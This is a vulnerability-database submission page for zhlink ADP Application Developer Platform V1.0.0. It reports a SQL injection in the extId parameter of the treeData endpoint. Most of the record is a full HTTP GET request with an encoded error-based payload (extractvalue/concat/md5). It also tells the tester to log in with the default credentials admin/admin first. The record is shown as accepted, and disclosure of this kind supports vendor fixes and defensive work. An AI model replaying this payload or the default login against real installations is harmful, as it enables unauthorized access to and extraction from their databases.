| Título | 智互联(深圳)科技有限公司 ADP应用开发者平台 zhlink V1.0.0 SQL Injection |
|---|
| Descrição | 漏洞地址:x.x.x.x:8083/adpweb/a/login
GET /adpweb/a/sys/office/treeData?companyid=&extId=%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281009983723%29%29%29and%27&isAll=&keywords=111&module=&t=1705660829107&type=1 HTTP/1.1
Host: x.x.x.x:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=5F82478A113439530681B398B1596D9C; zhilink.session.id=2efebc93c5ec4946af83e7d1c81a1bd7; lang=zh_CN; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1705660638; Hm_lpvt_82116c626a8d504a5c0675073362ef6f=1705660673
Referer: http://x.x.x.x:8083/adpweb/a/tag/treeselect?url=%2Fsys%2Foffice%2FtreeData%3Ftype%3D1%26companyid%3D&module=&checked=&extId=&isAll=
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
注入点参数:注入点参数:extId
使用默认口令admin/admin登录后测试注入
payload:/adpweb/a/sys/office/treeData?companyid=&extId=%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281009983723%29%29%29and%27&isAll=&keywords=111&module=&t=1705660829107&type=1 |
|---|
| Fonte | ⚠️ http://x.x.x.x:8083/adpweb/a/login |
|---|
| Utilizador | Id3al (UID 85503) |
|---|
| Submissão | 31/07/2025 11h03 (há 9 meses) |
|---|
| Moderação | 09/08/2025 09h46 (9 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 319335 [zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 treeData Injeção SQL] |
|---|
| Pontos | 20 |
|---|